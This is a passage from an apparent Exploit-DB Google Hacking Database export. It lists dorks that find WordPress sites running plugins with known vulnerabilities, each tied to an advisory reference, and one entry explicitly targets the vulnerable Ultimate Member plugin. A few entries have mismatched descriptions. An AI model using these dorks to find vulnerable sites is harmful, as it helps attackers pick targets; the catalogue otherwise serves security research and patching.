This google dork lists out Advisories and Vulnerabilities regarding the *Form
maker by 10Web *plugin.
Ref: https://wpvulndb.com/vulnerabilities/10237
Form Maker by 10Web &lt; 1.13.36 - Authenticated SQL Injection
Author: Ritik Kumar Jain (Dasagreeva)
LinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/
</textualDescription>
<query>inurl:wp-content/plugins/form-maker</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/form-maker</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ritik Kumar Jain</author>
</entry>
<entry>
<id>6394</id>
<link>https://www.exploit-db.com/ghdb/6394</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/form-maker</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/form-maker
Description: This google dork lists out Advisories and Vulnerabilities
regarding the form-maker wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10305
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/form-maker</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/form-maker</querystring>
<edb></edb>
<date>2020-07-13</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6354</id>
<link>https://www.exploit-db.com/ghdb/6354</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/gift</shortDescription>
<textualDescription>Google Dork:inurl:wp-content/plugins/gift
This google dork lists out Advisories and Vulnerabilities regarding all
plugins for the gift card and gift vouchers pages.
Ref:
1.WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL
Injection
https://www.exploit-db.com/exploits/45255
2.WooCommerce Smart Coupons &lt; 4.6.5 - Unauthenticated Coupon Creation
https://wpvulndb.com/vulnerabilities/10109
3. Gift Certificate Creator </textualDescription>
<query>inurl:wp-content/plugins/gift</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/gift</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Ritik Kumar Jain</author>
</entry>
<entry>
<id>6086</id>
<link>https://www.exploit-db.com/ghdb/6086</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/google-site-kit</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/google-site-kit
Description: This google dork lists out Advisories and Vulnerabilities
regarding the google site kit wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10224
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/google-site-kit</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/google-site-kit</querystring>
<edb></edb>
<date>2020-05-14</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6153</id>
<link>https://www.exploit-db.com/ghdb/6153</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/grand-media</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/grand-media
Description: This google dork lists out Advisories and Vulnerabilities
regarding the grand media wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10197
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/grand-media</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/grand-media</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6404</id>
<link>https://www.exploit-db.com/ghdb/6404</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/gravityforms</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/gravityforms
Description: This google dork lists out Advisories and Vulnerabilities
regarding the gravity forms wordpress plugin.
Ref: https://wpvulndb.com/vulnerabilities/10252
Author: Lokesh S
</textualDescription>
<query>inurl:wp-content/plugins/gravityforms</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/gravityforms</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Lokesh S</author>
</entry>
<entry>
<id>6160</id>
<link>https://www.exploit-db.com/ghdb/6160</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/gtranslate</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/gtranslate
Description: This google dork lists out Advisories and Vulnerabilities
regarding the gtranslate wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10181
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/gtranslate</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/gtranslate</querystring>
<edb></edb>
<date>2020-06-01</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6416</id>
<link>https://www.exploit-db.com/ghdb/6416</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/idx-broker-platinum</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/idx-broker-platinum
https://wpvulndb.com/vulnerabilities/10153
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/idx-broker-platinum</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/idx-broker-platinum</querystring>
<edb></edb>
<date>2020-07-17</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6151</id>
<link>https://www.exploit-db.com/ghdb/6151</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/iframe</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/iframe
Description: This google dork lists out Advisories and Vulnerabilities
regarding the iframe wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10221
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/iframe</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/iframe</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6427</id>
<link>https://www.exploit-db.com/ghdb/6427</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/iwp-client</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/iwp-client
https://wpvulndb.com/vulnerabilities/
10011
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/iwp-client</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/iwp-client</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6306</id>
<link>https://www.exploit-db.com/ghdb/6306</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/kingcomposer</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/kingcomposer
Description: This google dork lists out Advisories and Vulnerabilities
regarding the king composer wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10270
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/kingcomposer</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/kingcomposer</querystring>
<edb></edb>
<date>2020-06-17</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6402</id>
<link>https://www.exploit-db.com/ghdb/6402</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/kingcomposer</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/kingcomposer
Description: This google dork lists out Advisories and Vulnerabilities
regarding the kingcomposer wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/9265
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/kingcomposer</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/kingcomposer</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6397</id>
<link>https://www.exploit-db.com/ghdb/6397</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/knight-lab-timelinejs</shortDescription>
<textualDescription>Description: inurl:wp-content/plugins/knight-lab-timelinejs
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10298
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>inurl:wp-content/plugins/knight-lab-timelinejs</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/knight-lab-timelinejs</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6403</id>
<link>https://www.exploit-db.com/ghdb/6403</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/knight-lab-timelinejs</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/knight-lab-timelinejs
Description: This google dork lists out Advisories and Vulnerabilities
regarding the knight-lab-timelinejs wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10298
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/knight-lab-timelinejs</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/knight-lab-timelinejs</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6420</id>
<link>https://www.exploit-db.com/ghdb/6420</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/lifterlms</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/lifterlms
https://wpvulndb.com/vulnerabilities/10159
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/lifterlms</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/lifterlms</querystring>
<edb></edb>
<date>2020-07-17</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6173</id>
<link>https://www.exploit-db.com/ghdb/6173</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/mappress-google-maps-for-wordpress</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/mappress-google-maps-for-wordpress
Description: This google dork lists out Advisories and Vulnerabilities
regarding the mappress-google-maps-for-wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10246
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/mappress-google-maps-for-wordpress</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/mappress-google-maps-for-wordpress</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6439</id>
<link>https://www.exploit-db.com/ghdb/6439</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/my-calendar</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/my-calendar
Description: This google dork lists out Advisories and Vulnerabilities
regarding the my calendar wordpress plugin.
Ref: https://wpvulndb.com/vulnerabilities/9267
Author: Lokesh S
</textualDescription>
<query>inurl:wp-content/plugins/my-calendar</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/my-calendar</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Lokesh S</author>
</entry>
<entry>
<id>6395</id>
<link>https://www.exploit-db.com/ghdb/6395</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/newsletter</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/newsletter
Description: This google dork lists out Advisories and Vulnerabilities
regarding the newsletter wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10304
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/newsletter</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/newsletter</querystring>
<edb></edb>
<date>2020-07-13</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6125</id>
<link>https://www.exploit-db.com/ghdb/6125</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/official-mailerlite-sign-up-forms</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/official-mailerlite-sign-up-forms
Description: This google dork lists out Advisories and Vulnerabilities
regarding the Official MailerLite Sign Up Forms wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10235
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/official-mailerlite-sign-up-forms</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/official-mailerlite-sign-up-forms</querystring>
<edb></edb>
<date>2020-05-26</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6077</id>
<link>https://www.exploit-db.com/ghdb/6077</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/page-builder</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/page-builder
Description: This google dork lists out Advisories and Vulnerabilities
regarding the page builder by site origin wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10219
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/page-builder</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/page-builder</querystring>
<edb></edb>
<date>2020-05-12</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6109</id>
<link>https://www.exploit-db.com/ghdb/6109</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/paid-memberships-pro</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/paid-memberships-pro
Description: This google dork lists out Advisories and Vulnerabilities
regarding the paid memberships pro wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10231
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/paid-memberships-pro</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/paid-memberships-pro</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6374</id>
<link>https://www.exploit-db.com/ghdb/6374</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/payment-form-for-paypal-pro</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro
Description: This google dork lists out Advisories and Vulnerabilities
regarding the payment-form-for-paypal-pro wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10287
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/payment-form-for-paypal-pro</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/payment-form-for-paypal-pro</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6090</id>
<link>https://www.exploit-db.com/ghdb/6090</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/photo-gallery</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/photo-gallery
Description: This google dork lists out Advisories and Vulnerabilities
regarding the photo gallery wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10227
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/photo-gallery</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/photo-gallery</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6436</id>
<link>https://www.exploit-db.com/ghdb/6436</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/redirection</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/redirection
Description: This google dork lists out Advisories and Vulnerabilities
regarding the redirection wordpress plugin.
Ref: https://wpvulndb.com/vulnerabilities/9844
Author: Lokesh S
</textualDescription>
<query>inurl:wp-content/plugins/redirection</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/redirection</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Lokesh S</author>
</entry>
<entry>
<id>6425</id>
<link>https://www.exploit-db.com/ghdb/6425</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/safe-svg</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/safe-svg
https://wpvulndb.com/vulnerabilities/
9942
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/safe-svg</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/safe-svg</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6370</id>
<link>https://www.exploit-db.com/ghdb/6370</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/security-malware-firewall</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/security-malware-firewall
Description: This google dork lists out Advisories and Vulnerabilities
regarding the security-malware-firewall wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10292
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/security-malware-firewall</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/security-malware-firewall</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6414</id>
<link>https://www.exploit-db.com/ghdb/6414</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/sendpress</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/sendpress
Description: This google dork lists out Advisories and Vulnerabilities
regarding the sendpress wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10317
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/sendpress</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/sendpress</querystring>
<edb></edb>
<date>2020-07-16</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6426</id>
<link>https://www.exploit-db.com/ghdb/6426</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/sfwd-lms</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/sfwd-lms
https://wpvulndb.com/vulnerabilities/
10461
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/sfwd-lms</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/sfwd-lms</querystring>
<edb></edb>
<date>2020-07-21</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6198</id>
<link>https://www.exploit-db.com/ghdb/6198</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/simple-file-list</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/simple-file-list
Description: This google dork lists out Advisories and Vulnerabilities
regarding the simple-file-list wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10192
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/simple-file-list</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/simple-file-list</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6244</id>
<link>https://www.exploit-db.com/ghdb/6244</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/sportspress</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/elementor
Description: This google dork lists out Advisories and Vulnerabilities
regarding the elementor wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10257
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/sportspress</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/sportspress</querystring>
<edb></edb>
<date>2020-06-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6096</id>
<link>https://www.exploit-db.com/ghdb/6096</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/team-members</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/team-members
Description: This google dork lists out Advisories and Vulnerabilities
regarding the team members wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10228
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/team-members</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/team-members</querystring>
<edb></edb>
<date>2020-05-18</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6313</id>
<link>https://www.exploit-db.com/ghdb/6313</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/testimonial-rotator</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/testimonial-rotator
Description: This google dork lists out Advisories and Vulnerabilities
regarding the testimonial rotator wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10272
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/testimonial-rotator</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/testimonial-rotator</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6372</id>
<link>https://www.exploit-db.com/ghdb/6372</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/testimonials-widget</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/testimonials-widget
Description: This google dork lists out Advisories and Vulnerabilities
regarding the testimonials-widget wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10288
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/testimonials-widget</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/testimonials-widget</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6124</id>
<link>https://www.exploit-db.com/ghdb/6124</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/thirstyaffiliates</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/thirstyaffiliates
Description: This google dork lists out Advisories and Vulnerabilities
regarding the thirsty affiliates wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10234
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/thirstyaffiliates</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/thirstyaffiliates</querystring>
<edb></edb>
<date>2020-05-26</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6072</id>
<link>https://www.exploit-db.com/ghdb/6072</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/ultimate-elementor</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/ultimate-elementor
Description: This Google dork lists out Advisories and Vulnerabilities
about the Ultimate Elementor Plugin. Ref:
https://wpvulndb.com/vulnerabilities/10215
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/ultimate-elementor</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/ultimate-elementor</querystring>
<edb></edb>
<date>2020-05-08</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6998</id>
<link>https://www.exploit-db.com/ghdb/6998</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/Ultimate-member</shortDescription>
<textualDescription># Dork: inurl:wp-content/plugins/Ultimate-member
# Description:This google dork lists out website using this vulnerable wordpress plugin even provide path to it unistall or install php link
# exploit Ref:https://www.exploit-db.com/exploits/48065
Thanks and regards
Mayank Bharti (cleverfox)
</textualDescription>
<query>inurl:wp-content/plugins/Ultimate-member</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/Ultimate-member</querystring>
<edb></edb>
<date>2021-06-09</date>
<author>cleverfox</author>
</entry>
<entry>
<id>6437</id>
<link>https://www.exploit-db.com/ghdb/6437</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/updraftplus</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/updraftplus
Description: This google dork lists out Advisories and Vulnerabilities
regarding the updraftplus wordpress plugin.
Ref: https://wpvulndb.com/vulnerabilities/9843
Author: Lokesh S
</textualDescription>
<query>inurl:wp-content/plugins/updraftplus</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/updraftplus</querystring>
<edb></edb>
<date>2020-07-26</date>
<author>Lokesh S</author>
</entry>
<entry>
<id>6107</id>
<link>https://www.exploit-db.com/ghdb/6107</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/visualcomposer</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/visualcomposer
Description: This google dork lists out Advisories and Vulnerabilities
regarding the visual composer wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10229
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/visualcomposer</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/visualcomposer</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6413</id>
<link>https://www.exploit-db.com/ghdb/6413</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wd-google-maps</shortDescription>
<textualDescription>DORK: inurl:wp-content/plugins/wd-google-maps
https://wpvulndb.com/vulnerabilities/10099
This google dork gives us the advisories and vulnerabilities on wordpress
plugins
Thanks,
Sachin
</textualDescription>
<query>inurl:wp-content/plugins/wd-google-maps</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wd-google-maps</querystring>
<edb></edb>
<date>2020-07-16</date>
<author>Sachin Kattimani</author>
</entry>
<entry>
<id>6398</id>
<link>https://www.exploit-db.com/ghdb/6398</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wise-chat</shortDescription>
<textualDescription>Description: inurl:wp-content/plugins/wise-chat
This google dorks give us the advisories and vulnerabilities on wordpress
plugins.
Ref: https://wpvulndb.com/vulnerabilities/10299
Thanks,
Tanmay Bhattacharjee
</textualDescription>
<query>inurl:wp-content/plugins/wise-chat</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wise-chat</querystring>
<edb></edb>
<date>2020-07-14</date>
<author>Tanmay Bhattacharjee</author>
</entry>
<entry>
<id>6152</id>
<link>https://www.exploit-db.com/ghdb/6152</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/woo-order-export-lite</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/iframe
Description: This google dork lists out Advisories and Vulnerabilities
regarding the woo order export lite wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10212
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/woo-order-export-lite</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/woo-order-export-lite</querystring>
<edb></edb>
<date>2020-05-28</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6192</id>
<link>https://www.exploit-db.com/ghdb/6192</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/woocommerce</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/woocommerce
Description: This google dork lists out Advisories and Vulnerabilities
regarding the woo-commerce WordPress plugin.
Ref: https://wpvulndb.com/vulnerabilities/10220
Author: Abhinav Porwal
</textualDescription>
<query>inurl:wp-content/plugins/woocommerce</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/woocommerce</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhinav Porwal</author>
</entry>
<entry>
<id>6212</id>
<link>https://www.exploit-db.com/ghdb/6212</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wp-jobsearch</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/wp-jobsearch
Description: This google dork lists out Advisories and Vulnerabilities
regarding the wp-jobsearch wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10255
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/wp-jobsearch</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wp-jobsearch</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6373</id>
<link>https://www.exploit-db.com/ghdb/6373</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wp-jobsearch</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/wp-jobsearch
Description: This google dork lists out Advisories and Vulnerabilities
regarding the wp-jobsearch wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10290
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/wp-jobsearch</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wp-jobsearch</querystring>
<edb></edb>
<date>2020-07-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6393</id>
<link>https://www.exploit-db.com/ghdb/6393</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wp-live-chat-support</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/wp-live-chat-support
Description: This google dork lists out Advisories and Vulnerabilities
regarding the wp-live-chat-support wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10303
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/wp-live-chat-support</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wp-live-chat-support</querystring>
<edb></edb>
<date>2020-07-13</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6324</id>
<link>https://www.exploit-db.com/ghdb/6324</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>inurl:wp-content/plugins/wp-pro-quiz</shortDescription>
<textualDescription>Dork: inurl:wp-content/plugins/wp-pro-quiz
Description: This google dork lists out Advisories and Vulnerabilities
regarding the wp-pro quiz wordpress plugin. Ref:
https://wpvulndb.com/vulnerabilities/10278
Author: Abhi Chitkara
</textualDescription>
<query>inurl:wp-content/plugins/wp-pro-quiz</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/plugins/wp-pro-quiz</querystring>
<edb></edb>
<date>2020-06-23</date>
<author>Abhi Chitkara</author>
